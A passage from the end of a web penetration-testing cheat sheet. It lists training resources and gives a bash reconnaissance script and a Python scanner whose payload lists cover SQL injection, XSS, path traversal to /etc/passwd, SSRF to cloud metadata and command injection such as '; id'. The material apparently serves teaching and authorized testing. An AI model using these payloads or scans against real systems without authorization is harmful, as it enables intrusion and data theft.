|\n| **VulnHub** | https://www.vulnhub.com | Downloadable VMs |\n\n### CTF Platforms\n| Platform | URL | Focus |\n|----------|-----|-------|\n| **CTFtime** | https://ctftime.org | CTF calendar &amp; rankings |\n| **PicoCTF** | https://picoctf.org | Beginner-friendly |\n| **OverTheWire** | https://overthewire.org | WarGames |\n| **RingZer0** | https://ringzer0ctf.com | CTF challenges |\n| **Hacker101** | https://www.hacker101.com | Bug bounty training |\n\n### Bug Bounty 
Platforms\n| Platform | URL |\n|----------|-----|\n| **HackerOne** | https://www.hackerone.com |\n| **Bugcrowd** | https://www.bugcrowd.com |\n| **Intigriti** | https://www.intigriti.com |\n| **YesWeHack** | https://www.yeswehack.com |\n| **Synack** | https://www.synack.com |\n\n### Reference Materials\n\n#### Books\n| Title | Author | Focus |\n|-------|--------|-------|\n| **The Web Application Hacker's Handbook** | Stuttard &amp; Pinto | Web app testing |\n| **OWASP Testing Guide** | OWASP | Comprehensive methodology |\n| **Penetration Testing: A Hands-On Introduction** | Georgia Weidman | General pentesting |\n| **Red Team Field Manual** | Ben Clark | Quick reference |\n| **Blue Team Field Manual** | Alan White | Defense reference |\n| **Hacking: The Art of Exploitation** | Jon Erickson | Technical deep dive |\n\n#### Online Resources\n| Resource | URL | Focus |\n|----------|-----|-------|\n| **OWASP** | https://owasp.org | Web security |\n| **HackTricks** | https://book.hacktricks.xyz | Pentesting techniques |\n| **PayloadsAllTheThings** | https://github.com/swisskyrepo/PayloadsAllTheThings | Payload collection |\n| **GTFOBins** | https://gtfobins.github.io | Linux binary exploitation |\n| **LOLBAS** | https://lolbas-project.github.io | Windows binary exploitation |\n| **Exploit-DB** | https://www.exploit-db.com | Exploit database |\n| **CVE Details** | https://www.cvedetails.com | CVE database |\n| **MITRE ATT&amp;CK** | https://attack.mitre.org | Adversary tactics |\n\n### YouTube Channels\n| Channel | Focus |\n|---------|-------|\n| **IppSec** | HackTheBox walkthroughs |\n| **The Cyber Mentor** | Pentesting tutorials |\n| **ST\u00d6K** | Bug bounty |\n| **HackerSploit** | Security tutorials |\n| **John Hammond** | CTF walkthroughs |\n| **LiveOverflow** | Technical deep dives |\n\n### Certifications\n| Certification | Provider | Focus |\n|---------------|----------|-------|\n| **OSCP** | Offensive Security | Hands-on pentesting |\n| **OSWP** | Offensive 
Security | Wireless pentesting |\n| **OSWE** | Offensive Security | Web app pentesting |\n| **OSEP** | Offensive Security | Advanced evasion |\n| **CEH** | EC-Council | Ethical hacking |\n| **eWPT** | eLearnSecurity | Web pentesting |\n| **eCPPT** | eLearnSecurity | Network pentesting |\n| **PNPT** | TCM Security | Practical pentesting |\n| **GPEN** | GIAC | Network pentesting |\n| **GWAPT** | GIAC | Web app pentesting |\n| **CISSP** | ISC\u00b2 | Security management |\n\n---\n\n## Sample Scripts\n\n### Complete Reconnaissance Script\n\n```bash\n#!/bin/bash\n# recon.sh - Complete reconnaissance script\n# Usage: ./recon.sh target.com\n\nTARGET=\"$1\"\nOUTDIR=\"recon_${TARGET}_$(date +%Y%m%d_%H%M%S)\"\nmkdir -p \"$OUTDIR\"\ncd \"$OUTDIR\"\n\necho \"[*] Starting reconnaissance against $TARGET\"\necho \"[*] Output directory: $OUTDIR\"\n\n# 1. WHOIS\necho \"[*] WHOIS lookup...\"\nwhois \"$TARGET\" &gt; whois.txt 2&gt;&amp;1\n\n# 2. DNS enumeration\necho \"[*] DNS enumeration...\"\ndig \"$TARGET\" ANY +noall +answer &gt; dns_any.txt\ndig \"$TARGET\" MX +short &gt; dns_mx.txt\ndig \"$TARGET\" NS +short &gt; dns_ns.txt\ndig \"$TARGET\" TXT +short &gt; dns_txt.txt\n\n# Zone transfer attempt\nfor ns in $(cat dns_ns.txt); do\n    echo \"[*] Attempting zone transfer from $ns\"\n    dig AXFR \"$TARGET\" \"@$ns\" &gt;&gt; zonetransfer.txt 2&gt;&amp;1\ndone\n\n# 3. Subdomain enumeration\necho \"[*] Subdomain enumeration...\"\nsublist3r -d \"$TARGET\" -o sublist3r.txt &gt; /dev/null 2&gt;&amp;1\namass enum -passive -d \"$TARGET\" -o amass.txt &gt; /dev/null 2&gt;&amp;1\ncat sublist3r.txt amass.txt 2&gt;/dev/null | sort -u &gt; subdomains.txt\n\n# 4. HTTP probing\necho \"[*] HTTP probing...\"\nif [ -f subdomains.txt ]; then\n    httpx -l subdomains.txt -title -tech-detect -status-code -o httpx.txt\nfi\n\n# 5. 
Technology detection\necho \"[*] Technology detection...\"\nwhatweb \"https://$TARGET\" --log-json=whatweb.json &gt; /dev/null 2&gt;&amp;1\nwafw00f \"https://$TARGET\" &gt; waf.txt 2&gt;&amp;1\n\n# 6. HTTP headers\necho \"[*] HTTP headers...\"\ncurl -sI \"https://$TARGET\" &gt; headers.txt\n\n# 7. robots.txt &amp; sitemap\necho \"[*] robots.txt and sitemap...\"\ncurl -s \"https://$TARGET/robots.txt\" &gt; robots.txt\ncurl -s \"https://$TARGET/sitemap.xml\" &gt; sitemap.xml\n\n# 8. Wayback URLs\necho \"[*] Wayback Machine URLs...\"\nwaybackurls \"$TARGET\" &gt; wayback.txt\ngrep \"=\" wayback.txt &gt; wayback_params.txt\n\n# 9. Port scanning (quick)\necho \"[*] Quick port scan...\"\nnmap -T4 -F --open -oN nmap_quick.txt \"$TARGET\"\n\n# 10. Generate report\necho \"[*] Generating report...\"\ncat &gt; report.md &lt;&lt; EOF\n# Reconnaissance Report: $TARGET\n\n## Date\n$(date)\n\n## WHOIS Summary\n\\`\\`\\`\n$(head -20 whois.txt)\n\\`\\`\\`\n\n## DNS Records\n### Name Servers\n$(cat dns_ns.txt)\n\n### Mail Servers\n$(cat dns_mx.txt)\n\n### TXT Records\n$(cat dns_txt.txt)\n\n## Subdomains Found\n$(wc -l subdomains.txt 2&gt;/dev/null || echo \"0\") subdomains found\n\\`\\`\\`\n$(head -20 subdomains.txt 2&gt;/dev/null)\n\\`\\`\\`\n\n## Technologies Detected\n\\`\\`\\`\n$(cat whatweb.json 2&gt;/dev/null | jq -r '.[] | \"\\(.plugin): \\(.version // \"unknown\")\"' 2&gt;/dev/null)\n\\`\\`\\`\n\n## Security Headers\n\\`\\`\\`\n$(cat headers.txt)\n\\`\\`\\`\n\n## Open Ports\n\\`\\`\\`\n$(grep \"open\" nmap_quick.txt 2&gt;/dev/null | head -20)\n\\`\\`\\`\n\n## Interesting URLs from Wayback\n\\`\\`\\`\n$(head -20 wayback_params.txt 2&gt;/dev/null)\n\\`\\`\\`\nEOF\n\necho \"[+] Recon complete! 
Results in $OUTDIR\"\necho \"[+] Report: $OUTDIR/report.md\"\n```\n\n### Web Vulnerability Scanner\n\nEvery check below is a heuristic (reflection, error strings, timing, response length). Treat a hit as a lead to confirm by hand or with sqlmap/Burp, not as a finding.\n\n```python\n#!/usr/bin/env python3\n# web_scanner.py - Multi-vulnerability web scanner\n# Usage: python3 web_scanner.py -u \"https://target.com/page.php?id=1\"\n\nimport argparse\nimport re\nimport time\nimport urllib.parse\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclass WebScanner:\n    def __init__(self, base_url, threads=10, timeout=10):\n        # Split the query string off the URL: the tests rebuild it per\n        # parameter, so keeping it would produce \"...?id=1?id=payload\"\n        parsed = urllib.parse.urlparse(base_url)\n        self.base_url = urllib.parse.urlunparse(\n            parsed._replace(query='', fragment='')).rstrip('/')\n        self.url_params = list(urllib.parse.parse_qs(parsed.query).keys())\n        self.threads = threads\n        self.timeout = timeout\n        self.session = requests.Session()\n        self.session.headers.update({\n            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) WebScanner/1.0'\n        })\n        self.session.verify = False\n        self.findings = []\n        \n        # Payloads\n        self.sqli_payloads = [\n            \"' OR '1'='1\",\n            \"' OR 1=1--\",\n            \"1' AND '1'='1\",\n            \"1' AND '1'='2\",\n            \"1' UNION SELECT NULL--\",\n            \"1' UNION SELECT NULL,NULL--\",\n            \"1' AND SLEEP(5)--\",\n            \"1' WAITFOR DELAY '00:00:05'--\"\n        ]\n        \n        # Every payload must be non-empty: an empty string is \"reflected\"\n        # in every response and would flag each parameter as XSS\n        self.xss_payloads = [\n            \"&lt;script&gt;alert('XSS')&lt;/script&gt;\",\n            \"&lt;img src=x onerror=alert(1)&gt;\",\n            \"&lt;svg onload=alert(1)&gt;\",\n            \"javascript:alert(1)\",\n            \"\\\"&gt;&lt;script&gt;alert(1)&lt;/script&gt;\"\n        ]\n        \n        self.lfi_payloads = [\n            \"../../../etc/passwd\",\n            \"../../../../etc/passwd\",\n            \"..\\\\..\\\\..\\\\windows\\\\win.ini\",\n            \"../../../etc/passwd%00\",\n            \"../../../etc/passwd%00.png\"\n        ]\n        \n        self.ssrf_payloads = [\n            \"http://127.0.0.1/\",\n            \"http://localhost/\",\n            \"http://169.254.169.254/latest/meta-data/\",\n            \"http://[::1]/\",\n            \"file:///etc/passwd\"\n        ]\n        \n        self.cmdi_payloads = [\n            \"; id\",\n            \"| id\",\n            \"&amp;&amp; id\",\n            \"`id`\",\n            \"$(id)\",\n            \"; sleep 5\"\n        ]\n    \n    def discover_params(self):\n        \"\"\"Parameters from the URL, or common names when it carries none\"\"\"\n        if self.url_params:\n            return self.url_params\n        \n        return ['id', 'page', 'file', 'url', 'path', 'q', 'search', \n                'query', 'name', 'user', 'username', 'email', 'pass', \n                'password', 'redirect', 'return', 'next', 'view', \n                'action', 'cat', 'category']\n    \n    def test_sqli(self, url, param):\n        \"\"\"Test SQL injection: time-based, error-based, then boolean-based\"\"\"\n        for payload in self.sqli_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                start = time.time()\n                resp = self.session.get(test_url, timeout=self.timeout)\n                elapsed = time.time() - start\n                \n                # Time-based: only the SLEEP / WAITFOR payloads can cause the delay\n                if elapsed &gt; 4 and ('sleep' in payload.lower() or 'waitfor' in payload.lower()):\n                    self.add_finding('SQLi', param, payload, 'Time-based blind')\n                    return\n                \n                # Error-based: database error strings in the response\n                if any(err in resp.text.lower() for err in \n                       ['sql syntax', 'mysql', 'syntax error', 'ora-', 'microsoft ole db', 'pg_query', 'sqlite']):\n                    self.add_finding('SQLi', param, payload, 'Error-based')\n                    return\n                    \n            except requests.RequestException:\n                continue\n        \n        # Boolean-based: one comparison per parameter, after the payload loop.\n        # A length difference alone is a hint, not proof\n        true_payload = \"1' AND '1'='1\"\n        false_payload = \"1' AND '1'='2\"\n        try:\n            true_resp = self.session.get(f\"{url}?{param}={urllib.parse.quote(true_payload)}\", timeout=self.timeout)\n            false_resp = self.session.get(f\"{url}?{param}={urllib.parse.quote(false_payload)}\", timeout=self.timeout)\n            \n            if (true_resp.status_code == false_resp.status_code\n                    and len(true_resp.text) != len(false_resp.text)):\n                self.add_finding('SQLi', param, 'Boolean-based', \n                                'Different response lengths for true/false condition')\n        except requests.RequestException:\n            pass\n    \n    def test_xss(self, url, param):\n        \"\"\"Test Cross-Site Scripting\"\"\"\n        for payload in self.xss_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Reflected unencoded; an HTML-encoded echo is not exploitable\n                if payload in resp.text:\n                    self.add_finding('XSS', param, payload, 'Reflected')\n                    return\n                    \n            except requests.RequestException:\n                continue\n    \n    def test_lfi(self, url, param):\n        \"\"\"Test Local File Inclusion\"\"\"\n        for payload in self.lfi_payloads:\n            try:\n                # keep the %00 sequences as-is instead of double-encoding them\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload, safe='/%')}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Check for file contents (/etc/passwd or win.ini)\n                if re.search(r'root:.*:0:0:|\\[extensions\\]|for 16-bit app', resp.text):\n                    self.add_finding('LFI', param, payload, 'File read')\n                    return\n                    \n            except requests.RequestException:\n                continue\n    \n    def test_ssrf(self, url, param):\n        \"\"\"Test Server-Side Request Forgery\"\"\"\n        for payload in self.ssrf_payloads:\n            try:\n                
test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                resp = self.session.get(test_url, timeout=self.timeout)\n                \n                # Check for internal/cloud metadata\n                if re.search(r'ami-id|instance-id|localhost|root:', resp.text, re.I):\n                    self.add_finding('SSRF', param, payload, 'Internal access')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def test_cmdi(self, url, param):\n        \"\"\"Test Command Injection\"\"\"\n        for payload in self.cmdi_payloads:\n            try:\n                test_url = f\"{url}?{param}={urllib.parse.quote(payload)}\"\n                start = time.time()\n                resp = self.session.get(test_url, timeout=self.timeout)\n                elapsed = time.time() - start\n                \n                # Check for time-based\n                if elapsed &gt; 4 and 'sleep' in payload:\n                    self.add_finding('Command Injection', param, payload, 'Time-based')\n                    return\n                \n                # Check for command output\n                if re.search(r'uid=\\d+|gid=\\d+|root:', resp.text):\n                    self.add_finding('Command Injection', param, payload, 'Command output')\n                    return\n                    \n            except Exception as e:\n                continue\n    \n    def check_headers(self):\n        \"\"\"Check security headers\"\"\"\n        try:\n            resp = self.session.get(self.base_url, timeout=self.timeout)\n            headers = {k.lower(): v for k, v in resp.headers.items()}\n            \n            security_headers = {\n                'strict-transport-security': 'HSTS',\n                'content-security-policy': 'CSP',\n                'x-frame-options': 'X-Frame-Options',\n                'x-content-type-options': 'X-Content-Type-Options',\n                'x-xss-protection': 
'X-XSS-Protection',\n                'referrer-policy': 'Referrer-Policy'\n            }\n            \n            missing = []\n            for header, name in security_headers.items():\n                if header not in headers:\n                    missing.append(name)\n            \n            if missing:\n                self.findings.append({\n                    'type': 'Missing Security Headers',\n                    'details': f\"Missing: {', '.join(missing)}\"\n                })\n                \n        except Exception as e:\n            print(f\"[-] Header check failed: {e}\")\n    \n    def add_finding(self, vuln_type, param, payload, details):\n        \"\"\"Add finding to results\"\"\"\n        finding = {\n            'type': vuln_type,\n            'parameter': param,\n            'payload': payload,\n            'details': details,\n            'url': self.base_url\n        }\n        self.findings.append(finding)\n        print(f\"[!] Found: {vuln_type} on parameter '{param}' - {details}\")\n    \n    def scan(self):\n        \"\"\"Main scan function\"\"\"\n        print(f\"[*] Starting scan on {self.base_url}\")\n        \n        # Discover parameters\n        params = self.discover_params()\n        print(f\"[*] Testing parameters: {', '.join(params)}\")\n        \n        # Check headers\n        self.check_headers()\n        \n        # Test each parameter\n        for param in params:\n            print(f\"[*] Testing parameter: {param}\")\n            \n            # Run all tests\n            self.test_sqli(self.base_url, param)\n            self.test_xss(self.base_url, param)\n            self.test_lfi(self.base_url, param)\n            self.test_ssrf(self.base_url, param)\n            self.test_cmdi(self.base_url, param)\n        \n        # Print summary\n        print(\"\\n\" + \"=\"*50)\n        print(\"SCAN SUMMARY\")\n        print(\"=\"*50)\n        print(f\"Total findings: {len(self.findings)}\")\n        \n        for i, 
finding in enumerate(self.findings, 1):\n            print(f\"\\n{i}. {finding['type']}\")\n            print(f\"   Parameter: {finding.get('parameter', 'N/A')}\")\n            print(f\"   Details: {finding['details']}\")\n\ndef main():\n    parser = argparse.ArgumentParser(description='Web Vulnerability Scanner')\n    parser.add_argument('-u', '--url', required=True, help='Target URL')\n    parser.add_argument('-t', '--threads', type=int, default=10, help='Threads')\n    parser.add_argument('--timeout', type=int, default=10, help='Timeout')\n    \n    args = parser.parse_args()\n    \n    scanner = WebScanner(args.url, args.threads, args.timeout)\n    scanner.scan()\n\nif __name__ == '__main__':\n    import time\n    main()\n```\n\n---\n\n## Conclusion\n\nThis comprehensive web penetration testing cheat sheet covers the essential tools, techniques, and methodologies for ethical hacking and security testing. Remember:\n\n### Key Principles\n1. **Always obtain proper authorization** before testing\n2. **Stay within scope** defined in the rules of engagement\n3. **Document everything** for evidence and reporting\n4. **Follow responsible disclosure** when finding vulnerabilities\n5. **Continuous learning** - the security landscape constantly evolves\n\n### Next Steps\n1. Set up a practice lab (DVWA, WebGoat, HackTheBox)\n2. Master the core tools (Burp Suite, Nmap, SQLmap)\n3. Learn programming (Python, Bash, JavaScript)\n4. Get certified (OSCP, PNPT, etc.)\n5. Participate in bug bounty programs\n6. Stay updated with security news and CVEs\n\n### Stay Legal, Stay Ethical\nRemember that with great power comes great responsibility. Use these skills to make the internet safer, not to cause harm. Always test with permission and report vulnerabilities responsibly.\n\n---\n\n*\u00a9 2025 awjunaid.com - For authorized security testing only*", "creation_timestamp": "2026-07-02T07:27:36.996923Z"}
